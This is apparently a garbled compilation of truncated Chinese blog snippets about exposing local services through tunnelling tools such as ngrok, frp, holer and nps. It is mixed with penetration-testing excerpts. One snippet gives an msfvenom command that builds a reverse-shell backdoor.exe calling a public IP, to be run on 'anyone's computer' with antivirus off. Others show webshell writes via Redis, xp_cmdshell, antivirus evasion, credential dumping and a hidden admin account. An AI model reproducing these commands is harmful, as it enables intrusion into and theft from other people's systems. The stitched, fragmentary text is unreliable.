内网映射外网工具——ngrok 通过这个我们可以把本机的localhost:端口号映射成为一个外网地址 例如:我们平时启动服务器(如tomcat),然后localhost:8080/项目地址这种方式去本地访问...,项目无法运行在本机之外的电脑上,但我们通过这个外网映射工具后就可以把网址发给别来进行远程访问 废话不多说直接上步骤: 1、首先下载ngrok,去百度搜索下载就好了,解压 (https://ngrok.com.../download) 2、然后cmd到解压目录下(你的目录在哪你就进哪 cd C:\Users\yuqing.wu\Desktop\ngrok 3、根据你想要映射的端口号,一般如映射tomcat的8080...端口 继续在cmd控制台输入命令行 ngrok -configngrok.cfg -subdomain john 8080 注:其中john是自己取的,随意就行,8080是你想映射的端口号 我们可以看到...127.0.0.1:8080端口(本地) 映射成了john.tunnel.qydev.com 4、当我们启动tomcat服务器后(默认8080端口) 不用通过localhost:8080/项目 去访问项目了
fatedier/frp 五、http://ngrok.ittun.com/ 显示reconnecting,应该也不可用了 六、http://ngrok.ciqiuwl.cn/ 这个可以用,可以成功映射...,默认80端口,可以自己修改端口号 1,下载windows版本的客户端,解压到你喜欢的目录 2,在命令行下进入到ngrok客户端目录下 3,执行 ngrok -config=ngrok.cfg -subdomain
本地安装了一个Linux系统,只能在局域网内访问到,怎样从外网也能访问到本地的Linux系统呢?本文将介绍具体的实现步骤。 1....准备工作 1.1 启动Linux系统 默认Linux系统ssh服务端端口是22; 检查Linux系统连网是否正常,通过命令: ping www.holer.org 即可检查。 2....holer.org:65014 Local Address : 127.0.0.1:22 --------------------------------------------- 2.3 启动holer服务 Linux.../holer-xxx-xxx -k 8866daebe02846t88s166733595fff5d & 2.4 访问映射后的公网地址 在ssh客户端工具上输入主机名:holer.org,端口号: 65014...就可以从外网访问本地的Linux系统了。
渗透的大体过程 整个渗透测试的流程就是通过信息收,集到外网的 web 漏洞挖掘,来获取一个 webshell ,通过这个 shell 进一步利用来打进内网,进行内网渗透、域渗透,最终获取域控权限的一个过程...从 webshell 到内网 从 sql 注入到内网渗透 直接举例。 拿到一个 mssql 注入,并且可以开启 xp_cmdshell 设置执行任意命令的情况下(--os-shell)。...若公网跳板机是 linux 的话,可以使用 linux 版本的 lcx,也就是 portmap 用法: ....我们能访问到他的 80 端口的服务是因为在交换机/路由器上做了端口映射。 ? 在网络映射中是这样表示的: ?...所以这时候你一般就没有办法直接连接到他的 3389 端口,因为他在内网里所以就只能使用端口转发了。 如果存在外网 IP 的话显示的就是外网 IP。
前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。...工具: 我们到官网上下载就好了: https://github.com/fatedier/frp/releases 我这里下载的是最新版,当然我们还需要准备一台服务器,腾讯云什么就好 轻量级就可以了,...(这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp...LHOST=101.43.1.181 LPORT=8000 -f exe -o backdoor.exe -o选择文件名,ip地址选择外网服务器的地址 端口选择8000 下载到桌面 我这里用xshell...windows/meterpreter/reverse_tcp 设置IP和端口 然后我们生成就好,放到任意谁的电脑上,但是要关杀软,因为我们没加免杀,Windows自带的检测也要关闭 运行后成功外网上线
外网访问内网Web 本地安装了Web服务端,只能在局域网内访问,怎样从外网也能访问本地Web? 本文将介绍具体的实现步骤。 1....Windows系统平台: 打开CMD控制台,进入可执行程序所在的目录下,执行命令: holer-windows-xxx.exe -k 6688daebe02846t88s166733595eee5d Linux.../holer-xxx-xxx -k 6688daebe02846t88s166733595eee5d 2.4 访问映射后的公网地址 浏览器里输入如下URL,就可从外网也能访问本地Web了。
外网访问内网SpringBoot 本地安装了SpringBoot,只能在局域网内访问,怎样从外网也能访问本地SpringBoot? 本文将介绍具体的实现步骤。 1....2.3 启动holer服务 进入目录: holer-client/bin Windows系统平台: 双击startup.bat或者打开CMD控制台,进入目录下执行命令:startup.bat Linux...系统平台: 执行命令: sh startup.sh 2.4 访问映射后的公网地址 浏览器里输入如下URL,就可从外网也能访问本地SpringBoot了。
外网访问内网Tomcat 本地安装了Tomcat,只能在局域网内访问,怎样从外网也能访问本地Tomcat? 本文将介绍具体的实现步骤。 1....2.3 启动holer服务 进入目录: holer-client/bin Windows系统平台: 双击startup.bat或者打开CMD控制台,进入目录下执行命令:startup.bat Linux...系统平台: 执行命令: sh startup.sh 2.4 访问映射后的公网地址 浏览器里输入如下URL,就可从外网也能访问本地Tomcat了。
arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受...
前言:开发很方便 地址:http://www.ngrok.cc/ 下载地址: 1. 1.7版客户端: Linux 32Bit版本 Linux 64Bit版本 Linux ARM版本 Mac...配置文件 参数说明: auth_token:服务授权验证密钥 subdomain: 服务器分配域名前缀 proto:映射到局域网哪个...ip和端口(http服务) tcp:映射到局域网哪个ip和端口(tcp服务) remote_port:远程端口做tcp转发的时候使用(在平台申请绑定的端口...sunny Windows:ngrok.exe -config ngrok.cfg start sunny 意为将ngrok.cfg里配置的sunny服务启动,Windows在命令提示符窗口先进入到客户端软件目录执行...更多使用技巧,可以到ngrok官方去阅读文档。
外网访问内网Docker容器 局域网里的主机上安装了Docker容器,只能在内网访问,怎样从外网也能访问内网的Docker容器? 本文将介绍具体的实现步骤。 1....Windows系统平台: 打开CMD控制台,进入可执行程序所在的目录下执行命令: holer-windows-xxx.exe -k 8866daebe02846t88s166733595fff5d Linux.../holer-xxx-xxx -k 8866daebe02846t88s166733595fff5d & 2.4 访问映射后的公网地址 在ssh客户端上输入 主机名:holer.org 端口号: 65014...或者执行命令:ssh root@holer.org -p 65014 这样就可以从外网ssh登录到内网的Docker容器了。
在开发的时候常常需要把自己的demo部署到外网测设,或向他人展示自己的成果。...今天介绍一个简便的外网映射工具ngrok,利用ngrok把自己的主机映射到公网上,其他人可以通过公网访问本地的主机上的服务器。...用户 1,下载linux版本的客户端,解压到你喜欢的目录,注意:要给ngrok文件的可执行权限 2,在命令行下进入到path/to/linux_amd64/下 3,执行 ....,进入ngrok目录下,输入命令:ngrok -config=ngrok.cfg -subdomain minionscoding 8080 小黄人把本地8080(服务器tomcat所占用的端口)端口映射到外网...对比以下两图,通过本地访问和通过映射成的公网URL访问效果是一样的 ? ? 又get到新技能,快快试一试,和小伙伴分享你自己的应用吧
- 弱鸡 (ruoji.info) 第一个flag–外网打点 第一个flag就是签到题,当时图忘记留了,就是直接就给出flag了 图片 图片 Z-BlogPHP 1.7.2CMS,后台路径是zb_system...port=7001 protocol=http username=admin123 password=c8aZaU CS简单做个免杀套个壳改一下特征码即可实现绕火绒,上传上去之后cs上线 这地方到后面几天...,免杀也不行了,虽说上传上去了但是运行不上线,用powershell进行上线 上传fscan进行内网探测 fscan.exe -h 192.168.1.0/24 -o res.txt fscan.exe...#外网对应内网地址 [+] SSH:192.168.1.129:22:root root #蜜罐 192.168.243.135:3306 open 192.168.243.135:135 open...129几乎全是蜜罐 第三个flag-内网横向 cs上线 图片 抓取密码 -logonpasswords Authentication Id : 0 ; 506030 (00000000:0007b8ae
如果你不知道此后端教程在哪里请查阅:Centos搭建Frp内网映射服务 此博文前提是后端搭建完毕而描写的 ---- Linux前端搭建 毕竟我家里那台服务器本来就是Centos所以先说用Centos搭建...(此处如果您下载与我版本号不同请替换成您所下载的版本号)) tar zxf frp_0.33.0_linux_amd64.tar.gz 进入解压后的文件夹 cd frp_0.33.0_linux_amd64...本地访问端口 local_port = 22 # 远程访问端口 remote_port = 2201 # 这是个例子 [web] # 协议为http(即80端口) type = http # 内部映射的...IP local_ip =127.0.0.1 # 内部映射为80端口 local_port = 80 # 远程端口不用设置,只能沿用frps下vhost_http_port ① subdomain =...IP local_ip =127.0.0.1 # 内部映射为80端口 local_port = 80 # 远程端口不用设置,只能沿用frps下vhost_http_port ① subdomain =
外网访问内网MySQL数据库 本地安装了MySQL数据库,只能在局域网内访问,怎样从外网也能访问本地MySQL数据库? 本文将介绍具体的实现步骤。 1....Windows系统平台: 打开CMD控制台,进入可执行程序所在的目录下执行命令: holer-windows-xxx.exe -k 8866daebe02846t88s166733595fff5d Linux.../holer-xxx-xxx -k 8866daebe02846t88s166733595fff5d 2.4 访问映射后的公网地址 在数据库客户端上输入 主机名:holer.org 端口号: 65014...这样就可以从外网访问本地的MySQL数据库了。
外网访问内网网站 本地搭建了网站,只能在局域网内访问,怎样从外网也能访问本地网站? 本文将介绍具体的实现步骤。 1. 准备工作 1.1 安装并启动网站服务端 默认搭建的网站服务端端口是80。 2....Windows系统平台: 打开CMD控制台,进入可执行程序所在的目录下,执行命令: holer-windows-xxx.exe -k 6688daebe02846t88s166733595eee5d Linux.../holer-xxx-xxx -k 6688daebe02846t88s166733595eee5d & 2.4 访问映射后的公网地址 浏览器里输入如下URL,就可从外网也能访问本地网站了。
我们讲到了如何利用frp进行内网映射。使得内网的设备可以通过公网登录。但是frp相对来说都是通过配置命令参数来实现的。对小白而言还是有点挑战,今天来介绍另外一种简单的方法吧。...关于NPS nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。...目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网ttp代理、内网socks5代理,并带有功能强大的...实验环境 公网vps (服务端 centos7) 用户端 (kali linux 、Windows10) 下载nps 首先,根据自己的系统类型到项目地址去下载。...如上,登录后台后,我们只需根据实际需要,在后台添映射的目标即可。 添加映射目录 配置完成后,点击提交。 然后点击客户端,新增一个客户端。记录密匙! 点击tcp——添加根据实际情况填写相应的参数。
看着这个标题我我自己都有点懵,大概意思就是用自己家的电脑架设一个传奇服务端,然后用FRP内网穿透可以在外网玩,标题写的有点纠结,就这样吧。...请先准备工具: 1.电脑(能上网的那种); 2.服务器1台(自己玩1M宽带即可,很多人玩就自己看着办); 3.一个支持frp内网穿透的路由器(好像有软件也可以支持,没试过); 4.好像没了(一个脑子༼...∗ •̀ (oo) •́ ∗ ༽) 开始搞事情 先在服务器上面安装frp内网穿透:Frp内网穿透Frp一键安装脚本及设置教程 然后就在路由器设置和服务器没啥太大的关系了。...爱游这里配置了所有端口,就是测试的时候配置的,事实证明并不需要,只需要7000,7100,7200端口 还有就是要在基本设置里面设置成外网的IP地址,不然是不开门的。 ?...下面是在外网访问的效果:(图片大让它加载一会会儿) ?
从外网代码审计到三层内网各种漏洞拿到域控 代码审计拿到Webshell 首先是一个站:cocat.cc ?...内网渗透 通过查看当前机器进程发现有火绒 AV : ? 随即做免杀上线到 CS: ? 通过 nbtscan 发现内网还有一台主机存活: ?...随即写了一个 asp 的 shell 到 IIS 默认目录: 192.168.59.4:6379> config set dir C:/inetpub/wwwroot/ 192.168.59.4:6379...内网横向移动-对域内主机进行渗透 通过对内网进行存活探测发现内网存活了三台:10.10.10.201、10.10.10.202(本机)、10.10.10.209 for /l %i in (1,1,255...目标运行 9090.exe 上线到 MSF: ?
在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透...本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。...Passwordlist根据实际收集的密码来进行扫描,如果是普通密码破解,则可以使用top10000password这种字典,在内网中可以逐渐加强该字典,将收集到的所有用户密码全部加入。...图7获取当前用户权限为系统权限 (5)添加管理员用户到管理组 在DOS命令中分别执行以下语句 net user siweb$ siweb /add net localgroup administrators...XML********登录192.100.100.33服务器,如图16所示成功获取内网中一台服务器权限。
领取专属 10元无门槛券
手把手带您无忧上云